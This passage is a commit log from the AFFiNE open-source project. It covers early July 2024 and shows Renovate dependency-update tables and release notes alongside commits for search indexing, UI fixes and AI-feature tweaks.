| [@storybook/test-runner](https://togithub.com/storybookjs/test-runner ) | [`^0.18.0` -> `^0.19.0`](https://renovatebot.com/diffs/npm/@storybook%2ftest-runner/0.18.2/0.19.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@swc/core](https://swc.rs ) ([source](https://togithub.com/swc-project/swc )) | [`1.6.5` -> `1.6.7`](https://renovatebot.com/diffs/npm/@swc%2fcore/1.6.5/1.6.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/node](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node ) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node )) | [`20.14.8` -> `20.14.10`](https://renovatebot.com/diffs/npm/@types%2fnode/20.14.8/20.14.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vanilla-extract/vite-plugin](https://togithub.com/vanilla-extract-css/vanilla-extract ) ([source](https://togithub.com/vanilla-extract-css/vanilla-extract/tree/HEAD/packages/vite-plugin )) | [`4.0.11` -> `4.0.13`](https://renovatebot.com/diffs/npm/@vanilla-extract%2fvite-plugin/4.0.11/4.0.13 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vanilla-extract/webpack-plugin](https://togithub.com/vanilla-extract-css/vanilla-extract ) ([source](https://togithub.com/vanilla-extract-css/vanilla-extract/tree/HEAD/packages/webpack-plugin )) | [`2.3.10` -> `2.3.11`](https://renovatebot.com/diffs/npm/@vanilla-extract%2fwebpack-plugin/2.3.10/2.3.11 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [builder-util-runtime](https://togithub.com/electron-userland/electron-builder ) ([source](https://togithub.com/electron-userland/electron-builder/tree/HEAD/packages/builder-util-runtime )) | [`9.2.5-alpha.2` -> `9.2.5-alpha.3`](https://renovatebot.com/diffs/npm/builder-util-runtime/9.2.5-alpha.2/9.2.5-alpha.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [cloudflare/wrangler-action](https://togithub.com/cloudflare/wrangler-action ) | `v3.6.1` -> `v3.7.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | action | minor |
| [cssnano](https://togithub.com/cssnano/cssnano ) | [`7.0.3` -> `7.0.4`](https://renovatebot.com/diffs/npm/cssnano/7.0.3/7.0.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [embla-carousel-react](https://www.embla-carousel.com ) ([source](https://togithub.com/davidjerleke/embla-carousel )) | [`8.1.5` -> `8.1.6`](https://renovatebot.com/diffs/npm/embla-carousel-react/8.1.5/8.1.6 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [esbuild](https://togithub.com/evanw/esbuild ) | [`^0.21.0` -> `^0.23.0`](https://renovatebot.com/diffs/npm/esbuild/0.21.5/0.23.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [glob](https://togithub.com/isaacs/node-glob ) | [`10.4.2` -> `10.4.3`](https://renovatebot.com/diffs/npm/glob/10.4.2/10.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [jotai](https://togithub.com/pmndrs/jotai ) | [`2.8.3` -> `2.8.4`](https://renovatebot.com/diffs/npm/jotai/2.8.3/2.8.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [jotai](https://togithub.com/pmndrs/jotai ) | [`2.8.3` -> `2.8.4`](https://renovatebot.com/diffs/npm/jotai/2.8.3/2.8.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [lucide-react](https://lucide.dev ) ([source](https://togithub.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.394.0` -> `^0.400.0`](https://renovatebot.com/diffs/npm/lucide-react/0.394.0/0.400.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [napi](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.2` -> `3.0.0-alpha.4` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.1` -> `3.0.0-alpha.3` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [nest-commander](https://nest-commander.jaymcdoniel.dev ) ([source](https://togithub.com/jmcdo29/nest-commander/tree/HEAD/pacakges/nest-commander )) | [`3.13.0` -> `3.14.0`](https://renovatebot.com/diffs/npm/nest-commander/3.13.0/3.14.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [node](https://nodejs.org ) ([source](https://togithub.com/nodejs/node )) | `20.14.0` -> `20.15.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | | minor |
| [nx](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.3.1` -> `19.4.1`](https://renovatebot.com/diffs/npm/nx/19.3.1/19.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [openai](https://togithub.com/openai/openai-node ) | [`4.52.0` -> `4.52.3`](https://renovatebot.com/diffs/npm/openai/4.52.0/4.52.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [piscina](https://togithub.com/piscinajs/piscina ) | [`4.5.1` -> `4.6.1`](https://renovatebot.com/diffs/npm/piscina/4.5.1/4.6.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [playwright](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`1.44.1` -> `1.45.1`](https://renovatebot.com/diffs/npm/playwright/1.44.1/1.45.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [postcss](https://postcss.org/ ) ([source](https://togithub.com/postcss/postcss )) | [`8.4.38` -> `8.4.39`](https://renovatebot.com/diffs/npm/postcss/8.4.38/8.4.39 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [prisma](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/cli )) | [`5.15.1` -> `5.16.1`](https://renovatebot.com/diffs/npm/prisma/5.15.1/5.16.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [prom-client](https://togithub.com/siimon/prom-client ) | [`15.1.2` -> `15.1.3`](https://renovatebot.com/diffs/npm/prom-client/15.1.2/15.1.3 ) | [
2024-07-05 07:45:39 +00:00
liuyi
481a2269f8
chore: bump blocksuite ( #7424 )
2024-07-04 15:58:11 +08:00
liuyi
555f203be6
feat(core): run indexer in worker ( #7418 )
2024-07-04 15:37:26 +08:00
pengx17
5c1f78afd4
fix: invalid date handling ( #7422 )
...
fix AF-1049
2024-07-04 07:11:19 +00:00
CatsJuice
d6ad7d566f
chore(core): adjust ai onboarding dismiss logic, persist dialog and dismiss once closed ( #7417 )
2024-07-04 07:00:17 +00:00
hwangdev97
b79d13bcc8
fix: switch style: remove border and shadow ( #7423 )
...
- remove border and shadow
- fix position
before 👇

after 👇

2024-07-04 04:20:47 +00:00
donteatfriedrice
a0ce75c902
fix: ai button should not display in readonly mode ( #7415 )
...
[BS-737](https://linear.app/affine-design/issue/BS-737/shared-page-也可以用-ai )
2024-07-03 07:34:07 +00:00
darkskygit
e8285289fe
feat: improve histories query for forked session ( #7414 )
2024-07-03 04:49:19 +00:00
pengx17
cc7740d8d3
fix: some regression issues on quick search refactor ( #7410 )
...
- fix PD-1370. doc link resolve issue on pasting
- fix AF-1029
- implement doc creation in doc search
added two test cases to cover the above two issues.
2024-07-03 03:24:50 +00:00
darkskygit
61870c04d0
feat: fork session support ( #7367 )
2024-07-03 03:10:09 +00:00
pengx17
10df1fb4b7
fix: menu in peek view content not scrollable issue ( #7412 )
...
when using [dialog.overlay](https://github.com/radix-ui/primitives/blob/main/packages/react/dialog/src/Dialog.tsx#L203-L211
), whole app is affected by [react-scroll library](8923c513d2/src/SideEffect.tsx (L131-L134)
):
In the current implementation, only the contents in the dialog content will be scrollable and cannot be configured in current API.
This PR introduces a simple div overlay to get rid of this issue.
fix BS-696
2024-07-03 02:58:41 +00:00
zzj3720
0bc09a9333
feat(core): update blocksuite feature flag ( #7408 )
2024-07-03 02:47:20 +00:00
forehalo
f0d127fa29
Revert "feat(core): run indexer in worker ( #7295 )"
...
This reverts commit c62d79ab14 .
2024-07-03 10:16:27 +08:00
pengx17
fc729d6a32
fix: hide find in page command in cmdk ( #7413 )
2024-07-02 15:48:24 +00:00
pengx17
ef7ba273ab
fix: copy share link to clipboard command display issue ( #7411 )
...
fix AF-1027
2024-07-02 15:28:30 +00:00
renovate
b8b30e79e5
chore: bump up oxlint version to v0.5.2 ( #7383 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://togithub.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.5.0` -> `0.5.2`](https://renovatebot.com/diffs/npm/oxlint/0.5.0/0.5.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.5.2`](21b964b214...b66ad0b675 )
[Compare Source](21b964b214...b66ad0b675 )
### [`v0.5.1`](https://togithub.com/oxc-project/oxc/releases/tag/oxlint_v0.5.1 ): oxlint v0.5.1
[Compare Source](1d74db7774...21b964b214 )
#### \[0.5.1] - 2024-06-29
##### Bug Fixes
- [`c26975a`](https://togithub.com/oxc-project/oxc/commit/c26975a ) linter: Only show the filename for max-lines ([#​3966](https://togithub.com/oxc-project/oxc/issues/3966 )) (Boshen)
- [`94329e4`](https://togithub.com/oxc-project/oxc/commit/94329e4 ) linter: Handle useful but empty constructors in no-useless-constructor ([#​3951](https://togithub.com/oxc-project/oxc/issues/3951 )) (DonIsaac)
- [`6498a08`](https://togithub.com/oxc-project/oxc/commit/6498a08 ) linter: No-useless-spread fixer with multiple spread elements ([#​3950](https://togithub.com/oxc-project/oxc/issues/3950 )) (DonIsaac)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MjAuMSIsInVwZGF0ZWRJblZlciI6IjM3LjQyMS45IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-02 15:17:18 +00:00
pengx17
2a6ea3c9c6
feat(core): allow keyboard navigation in tags inline editor ( #7378 )
...
fix AF-966
- Allow using arrowup/down to navigate the tag list candidates; press enter to add the currently focused tag option;
- Allow using arrowleft/right to navigate the inline tag list (selected) and use backspace to delete focused tag.
2024-07-02 14:25:51 +00:00
EYHN
c62d79ab14
feat(core): run indexer in worker ( #7295 )
2024-07-02 09:18:08 +00:00
EYHN
27d0fc5108
refactor(core): use new backlink indexer ( #7296 )
2024-07-02 09:18:01 +00:00
EYHN
40e381e272
refactor(core): new quick search service ( #7214 )
2024-07-02 09:17:54 +00:00
EYHN
15e99c7819
feat(core): docs search service ( #7213 )
2024-07-02 09:17:47 +00:00
EYHN
3870801ebb
feat(infra): job system ( #7212 )
2024-07-02 09:17:40 +00:00
DarkSky
0957c30e74
docs: Update SECURITY.md ( #7406 )
2024-07-02 17:13:26 +08:00
EYHN
90e4a9b181
feat: doc search infra ( #7166 )
...
detail in `packages/common/infra/src/sync/indexer/README.md`
2024-07-02 08:52:33 +00:00
renovate
1997f24414
chore: bump up webpack-merge version to v6 ( #7407 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [webpack-merge](https://togithub.com/survivejs/webpack-merge ) | [`^5.10.0` -> `^6.0.0`](https://renovatebot.com/diffs/npm/webpack-merge/5.10.0/6.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>survivejs/webpack-merge (webpack-merge)</summary>
### [`v6.0.1`](https://togithub.com/survivejs/webpack-merge/blob/HEAD/CHANGELOG.md#601--2024-07-02 )
[Compare Source](https://togithub.com/survivejs/webpack-merge/compare/v6.0.0...2f610b9c2da066cc5d035ee83db84e22b7d42fb3 )
- Fix - Restore usage of `clone-deep` as there was a corner case where `structuredClone` did not work as expected. [#​214](https://togithub.com/survivejs/webpack-merge/issues/214 )
### [`v6.0.0`](https://togithub.com/survivejs/webpack-merge/blob/HEAD/CHANGELOG.md#600--xxxx-xx-xx )
[Compare Source](https://togithub.com/survivejs/webpack-merge/compare/v5.10.0...v6.0.0 )
- Chore - Update internal dependencies. As a result, the package needs at least Node 18 to run.
- Chore - Use `structuredClone` over `clone-deep` dependency since it is included to Node 18 or above. [#​214](https://togithub.com/survivejs/webpack-merge/issues/214 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MjEuMCIsInVwZGF0ZWRJblZlciI6IjM3LjQyMS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-02 08:32:26 +00:00
EYHN
3f8fe5cfae
fix(infra): override saved blocksuite feature flag ( #7399 )
2024-07-01 11:36:32 +00:00
Peng Xiao
8c4a42f0e6
fix: cmd-k keybinding not show when editor input is active ( #7398 )
2024-07-01 19:31:36 +08:00
Flrande
4d484ea814
feat: bump blocksuite ( #7372 )
2024-07-01 19:21:14 +08:00
EYHN
3bbb657a78
feat(core): replace ai template ( #7396 )
2024-07-01 10:24:54 +00:00
EYHN
39acb51d87
feat(core): adjust orm api ( #7392 )
...
Removed the `connect` and `disconnect` functions on the orm `DBAdapter`, making the ORM completely non-asynchronous.
2024-07-01 09:32:15 +00:00
KushalSharmaGit
d72dbe682c
fix: ensure exact tag matching with enter key behavior refinement ( #7387 )
...
Co-authored-by: Peng Xiao <pengxiao@outlook.com >
2024-07-01 10:16:16 +08:00